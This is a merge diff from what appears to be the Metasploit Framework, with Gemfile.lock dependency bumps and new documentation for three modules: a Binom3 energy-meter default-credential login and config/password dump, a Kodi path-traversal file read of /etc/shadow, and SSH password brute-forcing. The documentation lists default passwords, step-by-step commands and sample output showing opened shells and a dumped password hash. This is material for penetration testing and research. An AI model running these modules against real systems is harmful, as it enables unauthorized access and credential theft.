Merge branch 'master' into feature/aggregator

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.13.26)
+    metasploit-framework (4.14.1)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -21,6 +21,7 @@ PATH
       nessus_rest
       net-ssh
       network_interface
+      nexpose
       nokogiri
       octokit
       openssl-ccm
@@ -113,7 +114,7 @@ GEM
     childprocess (0.5.9)
       ffi (~> 1.0, >= 1.0.11)
     coderay (1.1.1)
-    contracts (0.14.0)
+    contracts (0.15.0)
     cucumber (2.4.0)
       builder (>= 2.1.2)
       cucumber-core (~> 1.5.0)
@@ -157,7 +158,7 @@ GEM
     grpc (1.1.2)
       google-protobuf (~> 3.1)
       googleauth (~> 0.5.1)
-    i18n (0.8.0)
+    i18n (0.8.1)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.0.3)
@@ -214,6 +215,7 @@ GEM
     nessus_rest (0.1.6)
     net-ssh (4.1.0)
     network_interface (0.0.1)
+    nexpose (5.3.0)
     nokogiri (1.7.0.1)
       mini_portile2 (~> 2.1.0)
     octokit (4.6.2)
@@ -270,7 +272,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.10)
+    rex-exploitation (0.1.11)
       jsobfu
       metasm
       rex-arch
@@ -342,7 +344,7 @@ GEM
     sqlite3 (1.3.13)
     sshkey (1.9.0)
     thor (0.19.4)
-    thread_safe (0.3.5)
+    thread_safe (0.3.6)
     timecop (0.8.1)
     tzinfo (1.2.2)
       thread_safe (~> 0.1)
@@ -374,4 +376,4 @@ DEPENDENCIES
   yard
 
 BUNDLED WITH
-   1.14.4
+   1.14.5

documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md

@@ -0,0 +1,33 @@
+This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/binom3_login_config_pass_dump```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
+msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7
+msf auxiliary(binom3_login_config_pass_dump) > run
+
+[+] 1.3.3.7:80 - Binom3 confirmed...
+[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7 - dumping configuration
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7:80 - File retrieved successfully!
+[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7 - dumping password file
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7:80 - File retrieved successfully!
+[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

documentation/modules/auxiliary/scanner/http/kodi_traversal.md

@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1.
+
+**Vulnerable Application Installation Steps**
+
+Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
+you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz),
+or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
+
+You'll need a version lower than 17.1 of Kodi.
+
+## Verification Steps
+
+A successful run of the exploit will look like this:
+
+```
+msf > use auxiliary/scanner/http/kodi_traversal
+msf auxiliary(kodi_traversal) > set RPORT 8080
+RPORT => 8080
+msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
+RHOSTS => 192.168.0.31
+msf auxiliary(kodi_traversal) > set FILE /etc/shadow
+FILE => /etc/shadow
+msf auxiliary(kodi_traversal) > run
+
+[*] Reading '/etc/shadow'
+[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+
+systemd-network:*:::::::
+root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
+nobody:*:::::::
+dbus:*:::::::
+system:*:::::::
+sshd:*:::::::
+avahi:*:::::::
+```

documentation/modules/auxiliary/scanner/ssh/ssh_login.md

@@ -0,0 +1,199 @@
+## SSH Service
+
+  SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.  SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
+  This module attempts to login to SSH with username and password combinations.  For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
+  It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
+
+## Verification Steps
+
+  1. Install SSH and start it.
+  2. Start msfconsole
+  3. Do: ` use auxiliary/scanner/ssh/ssh_login`
+  4. Do: `set rhosts`
+  5. Do: set usernames and passwords via any of the available options
+  5. Do: `run`
+  6. You will hopefully see something similar to, followed by a session:
+
+  ````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
+
+## Options
+
+  **BLANK_PASSWORD**
+
+  Boolean value on if an additional login attempt should be attempted with an empty password for every user.
+
+  **PASSWORD**
+
+  Password to try for each user.
+
+  **PASS_FILE**
+
+  A file containing a password on every line.  Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
+
+  **RHOSTS**
+
+  Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line.  File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
+
+  **STOP_ON_SUCCESS**
+
+  If a valid login is found on a host, immediately stop attempting additional logins on that host.
+
+  **USERNAME**
+
+  Username to try for each password.
+
+  **USERPASS_FILE**
+
+  A file containing a username and password, separated by a space, on every line.  An example line would be `username password`
+
+  **USER_AS_PASS**
+
+  Boolean value on if an additional login attempt should be attempted with the password as the username.
+
+  **USER_FILE**
+
+  A file containing a username on every line.
+
+  **VERBOSE**
+
+  Show a failed login attempt.  This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used.  A failed attempt will look similar to the following:
+
+  ```
+  [-] SSH - Failed: 'msfadmin:virtual'
+  ```
+
+## Option Combinations
+
+It is important to note that usernames and passwords can be entered in multiple combinations.  For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
+This module makes a combination of all of the above when attempting logins.  So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
+
+## Scenarios
+
+  Example run against:
+  * Ubuntu 14.04 Server with root login permitted: 192.168.2.156
+  * Ubuntu 16.04 Server: 192.168.2.137
+  * Metasploitable: 192.168.2.46
+  * Metasploitable 2: 192.168.2.35
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > cat /root/ssh_passwords.lst
+[*] exec: cat /root/ssh_passwords.lst
+
+msfadmin
+badpassword
+root
+ubuntu
+
+msf auxiliary(ssh_login) > set pass_file /root/ssh_passwords.lst
+pass_file => /root/ssh_passwords.lst
+msf auxiliary(ssh_login) > cat /root/ssh_un.lst
+[*] exec: cat /root/ssh_un.lst
+
+msfadmin
+badpassword
+root
+ubuntu
+
+msf auxiliary(ssh_login) > set user_file /root/ssh_un.lst
+user_file => /root/ssh_un.lst
+msf auxiliary(ssh_login) > cat /root/ssh_hosts.lst
+[*] exec: cat /root/ssh_hosts.lst
+
+192.168.2.156
+192.168.2.137
+192.168.2.35
+192.168.2.46
+msf auxiliary(ssh_login) > set rhosts file://root/ssh_hosts.lst
+rhosts => file://root/ssh_hosts.lst
+msf auxiliary(ssh_login) > set verbose false
+verbose => false
+msf auxiliary(ssh_login) > set threads 4
+threads => 4
+msf auxiliary(ssh_login) > exploit
+
+[*] SSH - Starting bruteforce
+[*] SSH - Starting bruteforce
+[*] SSH - Starting bruteforce
+[*] SSH - Starting bruteforce
+[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
+[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
+[*] Command shell session 5 opened (192.168.2.117:44415 -> 192.168.2.46:22) at 2017-02-22 20:26:13 -0500
+[*] Command shell session 6 opened (192.168.2.117:36107 -> 192.168.2.35:22) at 2017-02-22 20:26:13 -0500
+[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 7 opened (192.168.2.117:32829 -> 192.168.2.156:22) at 2017-02-22 20:26:35 -0500
+[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 8 opened (192.168.2.117:42205 -> 192.168.2.156:22) at 2017-02-22 20:26:42 -0500
+[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 9 opened (192.168.2.117:37027 -> 192.168.2.137:22) at 2017-02-22 20:26:44 -0500
+[*] Scanned 3 of 4 hosts (75% complete)
+[*] Scanned 4 of 4 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(ssh_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type          Information                              Connection
+  --  ----          -----------                              ----------
+  5   shell /linux  SSH msfadmin:msfadmin (192.168.2.46:22)  192.168.2.117:44415 -> 192.168.2.46:22 (192.168.2.46)
+  6   shell /linux  SSH msfadmin:msfadmin (192.168.2.35:22)  192.168.2.117:36107 -> 192.168.2.35:22 (192.168.2.35)
+  7   shell /linux  SSH root:ubuntu (192.168.2.156:22)       192.168.2.117:32829 -> 192.168.2.156:22 (192.168.2.156)
+  8   shell /linux  SSH ubuntu:ubuntu (192.168.2.156:22)     192.168.2.117:42205 -> 192.168.2.156:22 (192.168.2.156)
+  9   shell /linux  SSH ubuntu:ubuntu (192.168.2.137:22)     192.168.2.117:37027 -> 192.168.2.137:22 (192.168.2.137)
+```
+
+  Example run against:
+  * Windows 10 w/ Linux Subsystem
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > set rhosts 192.168.2.140
+rhosts => 192.168.2.140
+msf auxiliary(ssh_login) > set username winuser
+username => winuser
+msf auxiliary(ssh_login) > set password "badpassword"
+password => badpassword
+msf auxiliary(ssh_login) > exploit
+
+[*] SSH - Starting bruteforce
+[+] SSH - Success: 'winuser:badpassword' ''
+[!] No active DB -- Credential data will not be saved!
+[*] Command shell session 1 opened (192.168.2.117:42227 -> 192.168.2.140:22) at 2017-02-22 20:40:12 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(ssh_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type     Information                               Connection
+  --  ----     -----------                               ----------
+  1   shell /  SSH winuser:badpassword (192.168.2.140:22)  192.168.2.117:42227 -> 192.168.2.140:22 (192.168.2.140)
+
+```
+
+  Example run against:
+  * Windows 10 w/ Bitvise SSH Server (WinSSHD) version 7.26-r2 and a virtual account created
+
+  It is important to note here that the module gives back a **Success**, but then errors when trying to identify the remote system.
+  This should be enough info to manually exploit via a regular SSH command.
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > set rhosts 192.168.2.140
+rhosts => 192.168.2.140
+msf auxiliary(ssh_login) > set username virtual
+username => virtual
+msf auxiliary(ssh_login) > set password virtual
+password => virtual
+msf auxiliary(ssh_login) > exploit
+
+[*] SSH - Starting bruteforce
+[+] SSH - Success: 'virtual:virtual' 'id: Command not found.  help ?: Command not found.  '
+[!] No active DB -- Credential data will not be saved!
+[*] 192.168.2.140 - Command shell session 4 closed.  Reason: Died from EOFError
+[*] Command shell session 4 opened (192.168.2.117:36169 -> 192.168.2.140:22) at 2017-02-22 21:20:24 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```